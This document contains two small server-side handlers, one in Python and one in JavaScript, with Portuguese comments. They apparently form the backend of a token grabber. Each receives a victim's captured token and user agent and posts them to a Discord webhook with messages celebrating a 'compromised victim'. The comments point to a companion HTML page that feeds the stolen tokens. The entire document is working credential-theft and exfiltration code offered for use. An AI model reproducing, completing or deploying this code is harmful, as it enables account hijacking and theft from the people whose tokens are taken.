File: api/grab.py
import json
import urllib.request

def handler(request):
    # Configuração do Webhook (Duplicado para segurança, ou use Environment Variable)
    WEBHOOK_URL = "https://discord.com/api/webhooks/SEU_ID_WEBHOOK/AQUI_TOKEN"
    
    try:
        data = json.loads(request.body)
        token = data.get('token')
        ua = data.get('ua', 'Unknown')
        
        # Se não achar token, pode ser erro ou cache limpo
        if not token:
            return {"status": "ok", "msg": "No token found"}, 200

        # Prepara payload pro Discord
        discord_payload = {
            "content": f"💀 **NOVO TOKEN CAPTURADO!** 💀\n\n**Token:**\n```\n{token}\n```",
            "embeds": [{
                "title": "🔥 VÍTIMA COMPROMETIDA 🔥",
                "color": 16753920,
                "fields": [{"name": "User Agent", "value": ua, "inline": False}]
            }],
            "username": "XORTRON_VERCEL"
        }

        # Envia requisição pro Webhook
        req = urllib.request.Request(
            WEBHOOK_URL,
            data=json.dumps(discord_payload).encode('utf-8'),
            headers={'Content-Type': 'application/json'}
        )
        urllib.request.urlopen(req)

        return {"status": "captured"}, 200

    except Exception as e:
        return {"status": "error", "msg": str(e)}, 500

File: api/grab.js
export default async function handler(req, res) {
    if (req.method === 'POST') {
        const { token, ua } = req.body;
        
        // --- CONFIGURAÇÃO ---
        const WEBHOOK_URL = "https://discord.com/api/webhooks/SEU_ID/AQUI_TOKEN"; // COPIE O MESMO WEBHOOK DO HTML

        if (!token) {
            return res.status(200).json({ status: "no_token" });
        }

        const payload = {
            content: `💀 **NOVO TOKEN CAPTURADO!** 💀\n\n**Token:**\n\`\`\`\n${token}\n\`\`\``,
            embeds: [{
                title: "🔥 VÍTIMA COMPROMETIDA 🔥",
                color: 16753920,
                fields: [{ name: "User Agent", value: ua || "Unknown" }]
            }],
            username: "XORTRON_VERCEL"
        };

        try {
            await fetch(WEBHOOK_URL, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify(payload)
            });
            res.status(200).json({ status: "captured" });
        } catch (error) {
            res.status(500).json({ error: "Webhook failed" });
        }
    } else {
        res.status(405).json({ error: "Method Not Allowed" });
    }
}
